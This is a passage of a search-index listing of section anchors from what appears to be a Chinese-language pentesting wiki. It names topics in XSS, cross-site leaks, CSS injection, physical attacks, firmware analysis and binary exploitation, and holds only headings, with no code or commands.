eb/xss-cross-site-scripting/js-hoisting.html#场景","pentesting-web/xss-cross-site-scripting/js-hoisting.html#更多场景","pentesting-web/xss-cross-site-scripting/js-hoisting.html#通过-const-锁定名称来抢先阻止后续声明","pentesting-web/xss-cross-site-scripting/js-hoisting.html#references","pentesting-web/xss-cross-site-scripting/other-js-tricks.html#misc-js-tricks--relevant-info","pentesting-web/xss-cross-site-scripting/other-js-tricks.html#javascript-fuzzing","pentesting-web/xss-cross-site-scripting/other-js-tricks.html#有效的-js-注释字符","pentesting-web/xss-cross-site-scripting/other-js-tricks.html#有效的-js-新行字符","pentesting-web/xss-cross-site-scripting/other-js-tricks.html#有效的-js-空格在函数调用中","pentesting-web/xss-cross-site-scripting/other-js-tricks.html#生成字符串的有效字符","pentesting-web/xss-cross-site-scripting/other-js-tricks.html#surrogate-pairs-bf","pentesting-web/xss-cross-site-scripting/other-js-tricks.html#javascript-协议模糊测试","pentesting-web/xss-cross-site-scripting/other-js-tricks.html#url-模糊测试","pentesting-web/xss-cross-site-scripting/other-js-tricks.html#html-模糊测试","pentesting-web/xss-cross-site-scripting/other-js-tricks.html#分析属性","pentesting-web/xss-cross-site-scripting/other-js-tricks.html#map-js-文件","pentesting-web/xss-cross-site-scripting/other-js-tricks.html#---赋值","pentesting-web/xss-cross-site-scripting/other-js-tricks.html#函数技巧","pentesting-web/xss-cross-site-scripting/other-js-tricks.html#call-和-apply","pentesting-web/xss-cross-site-scripting/other-js-tricks.html#箭头函数","pentesting-web/xss-cross-site-scripting/other-js-tricks.html#bind-function","pentesting-web/xss-cross-site-scripting/other-js-tricks.html#函数代码泄露","pentesting-web/xss-cross-site-scripting/other-js-tricks.html#sandbox-escape---recovering-window-object","pentesting-web/xss-cross-site-scripting/other-js-tricks.html#访问值时的断点","pentesting-web/xss-cross-site-scripting/other-js-tricks.html#自动浏览器访问以测试有效载荷","pentesting-web/xss-cross-site-scripting/pdf-injection.html#pdf-注入","pentesting-web/xss-cross-site-scripting/pdf-injection.html#tldr--现代攻击工作流程-2024","pentesting-web/xss-cross-site-scripting/pdf-injection.html#有用的注入原语","pentesting-web/xss-cross-site-scripting/pdf-injection.html#盲枚举技巧","pentesting-web/xss-cross-site-scripting/pdf-injection.html#真实世界的漏洞-2023-2025","pentesting-web/xss-cross-site-scripting/pdf-injection.html#防御备忘单","pentesting-web/xss-cross-site-scripting/pdf-injection.html#参考文献","pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.html#服务器端-xss动态-pdf","pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.html#服务器端-xss动态-pdf-1","pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.html#常见-pdf-生成","pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.html#payloads","pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.html#发现","pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.html#svg","pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.html#路径泄露","pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.html#加载外部脚本","pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.html#读取本地文件--ssrf","pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.html#机器人延迟","pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.html#端口扫描","pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.html#ssrf","pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.html#attachments-pd4ml","pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.html#参考文献","pentesting-web/xss-cross-site-scripting/shadow-dom.html#shadow-dom","pentesting-web/xss-cross-site-scripting/some-same-origin-method-execution.html#some---same-origin-method-execution","pentesting-web/xss-cross-site-scripting/some-same-origin-method-execution.html#same-origin-method-execution","pentesting-web/xss-cross-site-scripting/some-same-origin-method-execution.html#exploitation","pentesting-web/xss-cross-site-scripting/some-same-origin-method-execution.html#example","pentesting-web/xss-cross-site-scripting/some-same-origin-method-execution.html#references","pentesting-web/xss-cross-site-scripting/sniff-leak.html#sniff-leak","pentesting-web/xss-cross-site-scripting/sniff-leak.html#通过将脚本内容转换为utf16进行泄露","pentesting-web/xss-cross-site-scripting/sniff-leak.html#通过将脚本内容视为ico进行泄露","pentesting-web/xss-cross-site-scripting/steal-info-js.html#steal-info-js","pentesting-web/xss-cross-site-scripting/wasm-linear-memory-template-overwrite-xss.html#webassembly-linear-memory-corruption-to-dom-xss-template-overwrite","pentesting-web/xss-cross-site-scripting/wasm-linear-memory-template-overwrite-xss.html#参考资料","pentesting-web/xss-cross-site-scripting/xss-in-markdown.html#xss-in-markdown","pentesting-web/xss-cross-site-scripting/xss-in-markdown.html#html-tags","pentesting-web/xss-cross-site-scripting/xss-in-markdown.html#javascript链接","pentesting-web/xss-cross-site-scripting/xss-in-markdown.html#img事件语法滥用","pentesting-web/xss-cross-site-scripting/xss-in-markdown.html#html-sanitiser-markdown-bypass","pentesting-web/xss-cross-site-scripting/xss-in-markdown.html#模糊测试","pentesting-web/xssi-cross-site-script-inclusion.html#xssi-cross-site-script-inclusion","pentesting-web/xssi-cross-site-script-inclusion.html#基本信息","pentesting-web/xssi-cross-site-script-inclusion.html#xssi--的关键特征","pentesting-web/xssi-cross-site-script-inclusion.html#类型","pentesting-web/xssi-cross-site-script-inclusion.html#常规-xssi","pentesting-web/xssi-cross-site-script-inclusion.html#动态javascript基础的xssi和认证javascript-xssi","pentesting-web/xssi-cross-site-script-inclusion.html#non-script-xssi","pentesting-web/xs-search/index.html#xs-searchxs-leaks","pentesting-web/xs-search/index.html#基本信息","pentesting-web/xs-search/index.html#可检测差异","pentesting-web/xs-search/index.html#包含方法","pentesting-web/xs-search/index.html#泄漏技术","pentesting-web/xs-search/index.html#xsinator-工具与论文","pentesting-web/xs-search/index.html#基于时间的技术","pentesting-web/xs-search/index.html#事件处理程序技术","pentesting-web/xs-search/index.html#onloadonerror","pentesting-web/xs-search/index.html#加载时延","pentesting-web/xs-search/index.html#卸载卸载前时延","pentesting-web/xs-search/index.html#沙盒框架时延--加载","pentesting-web/xs-search/index.html#id--error--onload","pentesting-web/xs-search/index.html#javascript-执行","pentesting-web/xs-search/index.html#corb---onerror","pentesting-web/xs-search/index.html#onblur","pentesting-web/xs-search/index.html#postmessage-广播","pentesting-web/xs-search/index.html#全局限制技术","pentesting-web/xs-search/index.html#websocket-api","pentesting-web/xs-search/index.html#支付-api","pentesting-web/xs-search/index.html#事件循环计时","pentesting-web/xs-search/index.html#忙碌事件循环","pentesting-web/xs-search/index.html#连接池","pentesting-web/xs-search/index.html#按目标的连接池","pentesting-web/xs-search/index.html#性能-api-技术","pentesting-web/xs-search/index.html#错误泄露","pentesting-web/xs-search/index.html#样式重载错误","pentesting-web/xs-search/index.html#请求合并错误","pentesting-web/xs-search/index.html#空页面泄露","pentesting-web/xs-search/index.html#xss-auditor-泄露","pentesting-web/xs-search/index.html#x-frame-泄露","pentesting-web/xs-search/index.html#下载检测","pentesting-web/xs-search/index.html#重定向开始泄露","pentesting-web/xs-search/index.html#持续时间重定向泄露","pentesting-web/xs-search/index.html#corp-泄露","pentesting-web/xs-search/index.html#服务工作者","pentesting-web/xs-search/index.html#缓存","pentesting-web/xs-search/index.html#网络持续时间","pentesting-web/xs-search/index.html#错误消息技术","pentesting-web/xs-search/index.html#媒体错误","pentesting-web/xs-search/index.html#cors-错误","pentesting-web/xs-search/index.html#sri-错误","pentesting-web/xs-search/index.html#csp-违规检测","pentesting-web/xs-search/index.html#缓存-1","pentesting-web/xs-search/index.html#csp-指令","pentesting-web/xs-search/index.html#corp","pentesting-web/xs-search/index.html#corb","pentesting-web/xs-search/index.html#cors-错误在源反射错误配置上","pentesting-web/xs-search/index.html#可读属性技术","pentesting-web/xs-search/index.html#fetch-重定向","pentesting-web/xs-search/index.html#coop","pentesting-web/xs-search/index.html#url-最大长度---服务器端","pentesting-web/xs-search/index.html#url-最大长度---客户端","pentesting-web/xs-search/index.html#最大重定向","pentesting-web/xs-search/index.html#历史长度","pentesting-web/xs-search/index.html#同一-url-的历史长度","pentesting-web/xs-search/index.html#frame-counting","pentesting-web/xs-search/index.html#htmlelements","pentesting-web/xs-search/index.html#information-exposed-by-html-elements","pentesting-web/xs-search/index.html#css-property","pentesting-web/xs-search/index.html#css-history","pentesting-web/xs-search/index.html#contentdocument-x-frame-leak","pentesting-web/xs-search/index.html#download-detection","pentesting-web/xs-search/index.html#partitioned-http-cache-bypass","pentesting-web/xs-search/index.html#manual-redirect","pentesting-web/xs-search/index.html#fetch-with-abortcontroller","pentesting-web/xs-search/index.html#script-pollution","pentesting-web/xs-search/index.html#service-workers","pentesting-web/xs-search/index.html#fetch-timing","pentesting-web/xs-search/index.html#cross-window-timing","pentesting-web/xs-search/index.html#with-html-or-re-injection","pentesting-web/xs-search/index.html#dangling-markup","pentesting-web/xs-search/index.html#image-lazy-loading","pentesting-web/xs-search/index.html#基于时间的图像懒加载","pentesting-web/xs-search/index.html#redos","pentesting-web/xs-search/index.html#css-redos","pentesting-web/xs-search/index.html#css-注入","pentesting-web/xs-search/index.html#防御","pentesting-web/xs-search/index.html#参考","pentesting-web/xs-search/connection-pool-example.html#连接池示例","pentesting-web/xs-search/connection-pool-example.html#sekaictf2022---safelist","pentesting-web/xs-search/connection-pool-example.html#利用1","pentesting-web/xs-search/connection-pool-example.html#exploit-2","pentesting-web/xs-search/connection-pool-example.html#dicectf-2022---carrot","pentesting-web/xs-search/connection-pool-by-destination-example.html#connection-pool-by-destination-example","pentesting-web/xs-search/cookie-bomb-+-onerror-xs-leak.html#cookie-bomb--onerror-xs-leak","pentesting-web/xs-search/cookie-bomb-+-onerror-xs-leak.html#references","pentesting-web/xs-search/url-max-length-client-side.html#url-最大长度---客户端","pentesting-web/xs-search/performance.now-example.html#performancenow-示例","pentesting-web/xs-search/performance.now-+-force-heavy-task.html#performancenow--force-heavy-task","pentesting-web/xs-search/event-loop-blocking-+-lazy-images.html#event-loop-blocking--lazy-images","pentesting-web/xs-search/javascript-execution-xs-leak.html#javascript-执行-xs-漏洞","pentesting-web/xs-search/css-injection/index.html#css-injection","pentesting-web/xs-search/css-injection/index.html#css-injection-1","pentesting-web/xs-search/css-injection/index.html#attribute-selector","pentesting-web/xs-search/css-injection/index.html#blind-attribute-selector","pentesting-web/xs-search/css-injection/index.html#import","pentesting-web/xs-search/css-injection/index.html#inline-style-css-exfiltration-attr--if--image-set","pentesting-web/xs-search/css-injection/index.html#其他选择器","pentesting-web/xs-search/css-injection/index.html#基于错误的-xs-search","pentesting-web/xs-search/css-injection/index.html#styling-scroll-to-text-fragment","pentesting-web/xs-search/css-injection/index.html#font-face--unicode-range","pentesting-web/xs-search/css-injection/index.html#text-node-exfiltration-i-ligatures","pentesting-web/xs-search/css-injection/index.html#text-node-exfiltration-ii-leaking-the-charset-with-a-default-font-not-requiring-external-assets","pentesting-web/xs-search/css-injection/index.html#text-node-exfiltration-iii-leaking-the-charset-通过隐藏元素并使用默认字体不需要外部资产","pentesting-web/xs-search/css-injection/index.html#text-node-exfiltration-iii-leaking-the-charset-by-cache-timing-not-requiring-external-assets","pentesting-web/xs-search/css-injection/index.html#text-node-exfiltration-iii-leaking-the-charset-by-timing-loading-hundreds-of-local-fonts-无需外部资源","pentesting-web/xs-search/css-injection/index.html#references","pentesting-web/xs-search/css-injection/css-injection-code.html#css-注入代码","pentesting-web/iframe-traps.html#iframe-traps","pentesting-web/iframe-traps.html#基本信息","hardware-physical-access/physical-attacks.html#物理攻击","hardware-physical-access/physical-attacks.html#bios-密码恢复和系统安全","hardware-physical-access/physical-attacks.html#uefi-安全","hardware-physical-access/physical-attacks.html#ram分析和冷启动攻击","hardware-physical-access/physical-attacks.html#直接内存访问dma攻击","hardware-physical-access/physical-attacks.html#使用live-cdusb进行系统访问","hardware-physical-access/physical-attacks.html#处理windows安全功能","hardware-physical-access/physical-attacks.html#启动和恢复快捷键","hardware-physical-access/physical-attacks.html#坏usb设备","hardware-physical-access/physical-attacks.html#卷影副本","hardware-physical-access/physical-attacks.html#绕过bitlocker加密","hardware-physical-access/physical-attacks.html#社会工程学用于恢复密钥添加","hardware-physical-access/physical-attacks.html#利用机箱入侵维护开关恢复bios出厂设置","hardware-physical-access/physical-attacks.html#攻击如何工作","hardware-physical-access/physical-attacks.html#现实世界示例--framework-13-笔记本电脑","hardware-physical-access/physical-attacks.html#通用利用程序","hardware-physical-access/physical-attacks.html#检测与缓解","hardware-physical-access/physical-attacks.html#参考文献","hardware-physical-access/escaping-from-gui-applications.html#从kiosk逃脱","hardware-physical-access/escaping-from-gui-applications.html#检查物理设备","hardware-physical-access/escaping-from-gui-applications.html#检查gui应用程序内可能的操作","hardware-physical-access/escaping-from-gui-applications.html#命令执行","hardware-physical-access/escaping-from-gui-applications.html#windows","hardware-physical-access/escaping-from-gui-applications.html#绕过路径限制","hardware-physical-access/escaping-from-gui-applications.html#下载您的二进制文件","hardware-physical-access/escaping-from-gui-applications.html#从浏览器访问文件系统","hardware-physical-access/escaping-from-gui-applications.html#快捷键","hardware-physical-access/escaping-from-gui-applications.html#滑动操作","hardware-physical-access/escaping-from-gui-applications.html#internet-explorer技巧","hardware-physical-access/escaping-from-gui-applications.html#显示文件扩展名","hardware-physical-access/escaping-from-gui-applications.html#浏览器技巧","hardware-physical-access/escaping-from-gui-applications.html#ipad","hardware-physical-access/escaping-from-gui-applications.html#手势和按钮","hardware-physical-access/escaping-from-gui-applications.html#快捷键-1","hardware-physical-access/escaping-from-gui-applications.html#参考文献","hardware-physical-access/firmware-analysis/index.html#固件分析","hardware-physical-access/firmware-analysis/index.html#介绍","hardware-physical-access/firmware-analysis/index.html#相关资源","hardware-physical-access/firmware-analysis/index.html#收集信息","hardware-physical-access/firmware-analysis/index.html#获取固件","hardware-physical-access/firmware-analysis/index.html#分析固件","hardware-physical-access/firmware-analysis/index.html#获取文件系统","hardware-physical-access/firmware-analysis/index.html#分析固件-1","hardware-physical-access/firmware-analysis/index.html#初步分析工具","hardware-physical-access/firmware-analysis/index.html#提取文件系统","hardware-physical-access/firmware-analysis/index.html#文件系统分析","hardware-physical-access/firmware-analysis/index.html#对编译二进制文件的安全检查","hardware-physical-access/firmware-analysis/index.html#模拟固件进行动态分析","hardware-physical-access/firmware-analysis/index.html#模拟单个二进制文件","hardware-physical-access/firmware-analysis/index.html#完整系统仿真","hardware-physical-access/firmware-analysis/index.html#实践中的动态分析","hardware-physical-access/firmware-analysis/index.html#运行时分析技术","hardware-physical-access/firmware-analysis/index.html#二进制利用和概念验证","hardware-physical-access/firmware-analysis/index.html#准备好的操作系统用于固件分析","hardware-physical-access/firmware-analysis/index.html#准备好的操作系统分析固件","hardware-physical-access/firmware-analysis/index.html#固件降级攻击与不安全的更新机制","hardware-physical-access/firmware-analysis/index.html#示例降级后的命令注入","hardware-physical-access/firmware-analysis/index.html#从移动应用提取固件","hardware-physical-access/firmware-analysis/index.html#更新逻辑评估清单","hardware-physical-access/firmware-analysis/index.html#演练的易受攻击固件","hardware-physical-access/firmware-analysis/index.html#参考资料","hardware-physical-access/firmware-analysis/index.html#培训和认证","hardware-physical-access/firmware-analysis/bootloader-testing.html#参考文献","hardware-physical-access/firmware-analysis/firmware-integrity.html#固件完整性","binary-exploitation/basic-stack-binary-exploitation-methodology/index.html#基本二进制利用方法论","binary-exploitation/basic-stack-binary-exploitation-methodology/index.html#elf-基本信息","binary-exploitation/basic-stack-binary-exploitation-methodology/index.html#利用工具","binary-exploitation/basic-stack-binary-exploitation-methodology/index.html#栈溢出方法论","binary-exploitation/basic-stack-binary-exploitation-methodology/index.html#控制流程","binary-exploitation/basic-stack-binary-exploitation-methodology/index.html#永久循环","binary-exploitation/basic-stack-binary-exploitation-methodology/index.html#利用目标","binary-exploitation/basic-stack-binary-exploitation-methodology/index.html#目标调用现有函数","binary-exploitation/basic-stack-binary-exploitation-methodology/index.html#目标rce","binary-exploitation/basic-stack-binary-exploitation-methodology/elf-tricks.html#elf-基本信息","binary-exploitation/basic-stack-binary-exploitation-methodology/elf-tricks.html#程序头","binary-exploitation/basic-stack-binary-exploitation-methodology/elf-tricks.html#phdr---程序头","binary-exploitation/basic-stack-binary-exploitation-methodology/elf-tricks.html#interp","binary-exploitation/basic-stack-binary-exploitation-methodology/elf-tricks.html#load","binary-exploitation/basic-stack-binary-exploitation-methodology/elf-tricks.html#dynamic","binary-exploitation/basic-stack-binary-exploitation-methodology/elf-tricks.html#note","binary-exploitation/basic-stack-binary-exploitation-methodology/elf-tricks.html#gnu_eh_frame","binary-exploitation/basic-stack-binary-exploitation-methodology/elf-tricks.html#gnu_stack","binary-exploitation/basic-stack-binary-exploitation-methodology/elf-tricks.html#gnu_relro","binary-exploitation/basic-stack-binary-exploitation-methodology/elf-tricks.html#tls","binary-exploitation/basic-stack-binary-exploitation-methodology/elf-tricks.html#节头","binary-exploitation/basic-stack-binary-exploitation-methodology/elf-tricks.html#元部分","binary-exploitation/basic-stack-binary-exploitation-methodology/elf-tricks.html#主要部分","binary-exploitation/basic-stack-binary-exploitation-methodology/elf-tricks.html#符号","binary-exploitation/basic-stack-binary-exploitation-methodology/elf-tricks.html#动态节","binary-exploitation/basic-stack-binary-exploitation-methodology/elf-tricks.html#动态加载器搜索顺序-rpathrunpath-origin","binary-exploitation/basic-stack-binary-exploitation-methodology/elf-tricks.html#重定位","binary-exploitation/basic-stack-binary-exploitation-methodology/elf-tricks.html#静态重定位","binary-exploitation/basic-stack-binary-exploitation-methodology/elf-tricks.html#动态重定位和got","binary-exploitation/basic-stack-binary-exploitation-methodology/elf-tricks.html#过程链接表","binary-exploitation/basic-stack-binary-exploitation-methodology/elf-tricks.html#程序初始化","binary-exploitation/basic-stack-binary-exploitation-methodology/elf-tricks.html#初始化顺序","binary-exploitation/basic-stack-binary-exploitation-methodology/elf-tricks.html#线程局部存储-tls","binary-exploitation/basic-stack-binary-exploitation-methodology/elf-tricks.html#辅助向量-auxv-和-vdso","binary-exploitation/basic-stack-binary-exploitation-methodology/elf-tricks.html#references","binary-exploitation/basic-stack-binary-exploitation-methodology/tools/index.html#利用工具","binary-exploitation/basic-stack-binary-exploitation-methodology/tools/index.html#metasploit","binary-exploitation/basic-stack-binary-exploitation-methodology/tools/index.html#shellcodes","binary-exploitation/basic-stack-binary-exploitation-methodology/tools/index.html#gdb","binary-exploitation/basic-stack-binary-exploitation-methodology/tools/index.html#安装","binary-exploitation/basic-stack-binary-exploitation-methodology/tools/index.html#参数","binary-exploitation/basic-stack-binary-exploitation-methodology/tools/index.html#指令","binary-exploitation/basic-stack-binary-exploitation-methodology/tools/index.html#gef","binary-exploitation/basic-stack-binary-exploitation-methodology/tools/index.html#tricks","binary-exploitation/basic-stack-binary-exploitation-methodology/tools/index.html#gdb-服务器","binary-exploitation/basic-stack-binary-exploitation-methodology/tools/index.html#ghidra","binary-exploitation/basic-stack-binary-exploitation-methodology/tools/index.html#查找栈偏移","binary-exploitation/basic-stack-binary-exploitation-methodology/tools/index.html#qtool","binary-exploitation/basic-stack-binary-exploitation-methodology/tools/index.html#gcc","binary-exploitation/basic-stack-binary-exploitation-methodology/tools/index.html#objdump","binary-exploitation/basic-stack-binary-exploitation-methodology/tools/index.html#core-dumps","binary-exploitation/basic-stack-binary-exploitation-methodology/tools/index.html#更多","binary-exploitation/basic-stack-binary-exploitation-methodology/tools/index.html#inmunity-debugger","binary-exploitation/basic-stack-binary-exploitation-methodology/tools/index.html#ida","binary-exploitation/basic-stack-binary-exploitation-methodology/tools/index.html#在远程-linux-中调试","binary-exploitation/basic-stack-binary-exploitation-methodology/tools/pwntools.html#pwntools","binary-exploitation/basic-stack-binary-exploitation-methodology/tools/pwntools.html#pwn-asm","binary-exploitation/basic-stack-binary-exploitation-methodology/tools/pwntools.html#pwn-checksec","binary-exploitation/basic-stack-binary-exploitation-methodology/tools/pwntools.html#pwn-constgrep","binary-exploitation/basic-stack-binary-exploitation-methodology/tools/pwntools.html#pwn-cyclic","binary-exploitation/basic-stack-binary-exploitation-methodology/tools/pwntools.html#pwn-调试","binary-exploitation/basic-stack-binary-exploitation-methodology/tools/pwntools.html#pwn-禁用-nx","binary-exploitation/basic-stack-binary-exploitation-methodology/tools/pwntools.html#pwn-disasm","binary-exploitation/basic-stack-binary-exploitation-methodology/tools/pwntools.html#pwn-elfdiff","binary-exploitation/basic-stack-binary-exploitation-methodology/tools/pwntools.html#pwn-hex","binary-exploitation/basic-stack-binary-exploitation-methodology/tools/pwntools.html#pwn-phd","binary-exploitation/basic-stack-binary-exploitation-methodology/tools/pwntools.html#pwn-pwnstrip","binary-exploitation/basic-stack-binary-exploitation-methodology/tools/pwntools.html#pwn-scrable","binary-exploitation/basic-stack-binary-exploitation-methodology/tools/pwntools.html#pwn-shellcraft","binary-exploitation/basic-stack-binary-exploitation-methodology/tools/pwntools.html#pwn-模板","binary-exploitation/basic-stack-binary-exploitation-methodology/tools/pwntools.html#pwn-unhex","binary-exploitation/basic-stack-binary-exploitation-methodology/tools/pwntools.html#pwn-更新","binary-exploitation/stack-overflow/index.html#stack-overflow","binary-exploitation/stack-overflow/index.html#什么是-stack-overflow","binary-exploitation/stack-overflow/index.html#查找-stack-overflows-偏移量","binary-exploitation/stack-overflow/index.html#利用-stack-overflows","binary-exploitation/stack-overflow/index.html#ret2win","binary-exploitation/stack-overflow/index.html#stack-shellcode","binary-exploitation/stack-overflow/index.html#windows-seh-based-exploitation-nsehseh","binary-exploitation/stack-overflow/index.html#rop--ret2-techniques","binary-exploitation/stack-overflow/index.html#heap-overflows","binary-exploitation/stack-overflow/index.html#types-of-protections","binary-exploitation/stack-overflow/index.html#real-world-example-cve-2025-40596-sonicwall-sma100","binary-exploitation/stack-overflow/index.html#真实案例cve-2025-23310--cve-2025-23311-nvidia-triton-inference-server","binary-exploitation/stack-overflow/index.html#参考资料","binary-exploitation/stack-overflow/pointer-redirecting.html#指针重定向","binary-exploitation/stack-overflow/pointer-redirecting.html#字符串指针","binary-exploitation/stack-overflow/pointer-redirecting.html#函数指针","binary-exploitation/stack-overflow/pointer-redirecting.html#参考","binary-exploitation/stack-overflow/ret2win/index.html#ret2win","binary-exploitation/stack-overflow/ret2win/index.html#基本信息","binary-exploitation/stack-overflow/ret2win/index.html#c-示例","binary-exploitation/stack-overflow/ret2win/index.html#使用-pwntools-的-python-利用","binary-exploitation/stack-overflow/ret2win/index.html#保护措施","binary-exploitation/stack-overflow/ret2win/index.html#其他示例与参考","binary-exploitation/stack-overflow/ret2win/index.html#arm64-示例","binary-exploitation/stack-overflow/ret2win/ret2win-arm64.html#ret2win---arm64","binary-exploitation/stack-overflow/ret2win/ret2win-arm64.html#代码","binary-exploitation/stack-overflow/ret2win/ret2win-arm64.html#aarch64-调用约定快速要点","binary-exploitation/stack-overflow/ret2win/ret2win-arm64.html#寻找偏移量","binary-exploitation/stack-overflow/ret2win/ret2win-arm64.html#模式选项","binary-exploitation/stack-overflow/ret2win/ret2win-arm64.html#栈偏移选项","binary-exploitation/stack-overflow/ret2win/ret2win-arm64.html#no-pie","binary-exploitation/stack-overflow/ret2win/ret2win-arm64.html#常规","binary-exploitation/stack-overflow/ret2win/ret2win-arm64.html#off-by-1","binary-exploitation/stack-overflow/ret2win/ret2win-arm64.html#在启用-pie-时","binary-exploitation/stack-overflow/ret2win/ret2win-arm64.html#off-by-2","binary-exploitation/stack-overflow/ret2win/ret2win-arm64.html#notes-on-modern-aarch64-hardening-pacbti-and-ret2win","binary-exploitation/stack-overflow/ret2win/ret2win-arm64.html#running-on-nonarm64-hosts-qemuuser-quick-tip","binary-exploitation/stack-overflow/ret2win/ret2win-arm64.html#相关-hacktricks-页面","binary-exploitation/stack-overflow/ret2win/ret2win-arm64.html#ret2syscall---arm64","binary-exploitation/stack-overflow/ret2win/ret2win-arm64.html#参考资料","binary-exploitation/stack-overflow/stack-shellcode/index.html#stack-shellcode","binary-exploitation/stack-overflow/stack-shellcode/index.html#基本信息","binary-exploitation/stack-overflow/stack-shellcode/index.html#c-示例一个易受攻击的程序","binary-exploitation/stack-overflow/stack-shellcode/index.html#compilation","binary-exploitation/stack-overflow/stack-shellcode/index.html#python-exploit-using-pwntools","binary-exploitation/stack-overflow/stack-shellcode/index.html#windows-x64-bypass-nx-with-virtualalloc-rop-ret2stack-shellcode","binary-exploitation/stack-overflow/stack-shellcode/index.html#其他示例与参考","binary-exploitation/stack-overflow/stack-shellcode/index.html#参考","binary-exploitation/stack-overflow/stack-shellcode/stack-shellcode-arm64.html#stack-shellcode---arm64","binary-exploitation/stack-overflow/stack-shellcode/stack-shellcode-arm64.html#linux","binary-exploitation/stack-overflow/stack-shellcode/stack-shellcode-arm64.html#代码","binary-exploitation/stack-overflow/stack-shellcode/stack-shellcode-arm64.html#no-aslr--no-canary---stack-overflow","binary-exploitation/stack-overflow/stack-shellcode/stack-shellcode-arm64.html#macos","binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.html#stack-pivoting---ebp2ret---ebp-chaining","binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.html#基本信息","binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.html#ebp2ret","binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.html#ebp-链接","binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.html#ebp-可能未被使用","binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.html#控制rsp的其他方法","binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.html#pop-rsp小工具","binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.html#xchg--rsp-gadget","binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.html#jmp-esp","binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.html#快速查找-pivot-gadgets","binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.html#经典的透视阶段模式","binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.html#现代缓解措施破坏堆栈透视cet阴影堆栈","binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.html#arm64","binary-exploitation/stack-overflow/stack-pivoting-ebp2ret-ebp-chaining.html#参考文献","binary-exploitation/stack-overflow/uninitialized-variables.html#未初始化变量","binary-exploitation/stack-overflow/uninitialized-variables.html#基本信息","binary-exploitation/stack-overflow/uninitialized-variables.html#示例","binary-exploitation/stack-overflow/uninitialized-variables.html#arm64-示例","binary-exploitation/rop-return-oriented-programing/index.html#rop---return-oriented-programing","binary-exploitation/rop-return-oriented-programing/index.html#基本信息","binary-exploitation/rop-return-oriented-programing/index.html#rop-的工作原理","binary-exploitation/rop-return-oriented-programing/index.html#工具","binary-exploitation/rop-return-oriented-programing/index.html#x86-示例中的-rop-链","binary-exploitation/rop-return-oriented-programing/index.html#x86-32位-调用约定","binary-exploitation/rop-return-oriented-programing/index.html#查找-gadgets","binary-exploitation/rop-return-oriented-programing/index.html#rop-链","binary-exploitation/rop-return-oriented-programing/index.html#rop-chain-in-x64-示例","binary-exploitation/rop-return-oriented-programing/index.html#x64-64位-调用约定","binary-exploitation/rop-return-oriented-programing/index.html#rop-链-1","binary-exploitation/rop-return-oriented-programing/index.html#栈对齐","binary-exploitation/rop-return-oriented-programing/index.html#x86-与-x64-的主要区别","binary-exploitation/rop-return-oriented-programing/index.html#arm64-示例中的-rop-chain","binary-exploitation/rop-return-oriented-programing/index.html#arm64-基础与调用约定","binary-exploitation/rop-return-oriented-programing/index.html#针对-rop-的保护","binary-exploitation/rop-return-oriented-programing/index.html#基于-rop-的技术","binary-exploitation/rop-return-oriented-programing/index.html#其他示例与参考","binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.html#brop---blind-return-oriented-programming","binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.html#基本信息","binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.html#攻击","binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.html#1-找到易受攻击的偏移--发送一个字符直到检测到服务器故障","binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.html#2-暴力破解canary--以泄露它","binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.html#3-暴力破解存储的rbp和rip--地址以泄露它们","binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.html#4-找到停止小工具","binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.html#5-找到brop小工具","binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.html#6-找到plt","binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.html#7-找到strcmp","binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.html#8-找到write或等效函数","binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.html#自动利用","binary-exploitation/rop-return-oriented-programing/brop-blind-return-oriented-programming.html#参考文献","binary-exploitation/rop-return-oriented-programing/ret2csu.html#ret2csu","binary-exploitation/rop-return-oriented-programing/ret2csu.html#httpswwwscsstanfordedubropbittau-broppdf-基本信息","binary-exploitation/rop-return-oriented-programing/ret2csu.html#__libc_csu_init-中的魔法-gadgets","binary-exploitation/rop-return-oriented-programing/ret2csu.html#rdi-和-rsi","binary-exploitation/rop-return-oriented-programing/ret2csu.html#示例","binary-exploitation/rop-return-oriented-programing/ret2csu.html#使用调用","binary-exploitation/rop-return-oriented-programing/ret2csu.html#绕过调用并到达-ret","binary-exploitation/rop-return-oriented-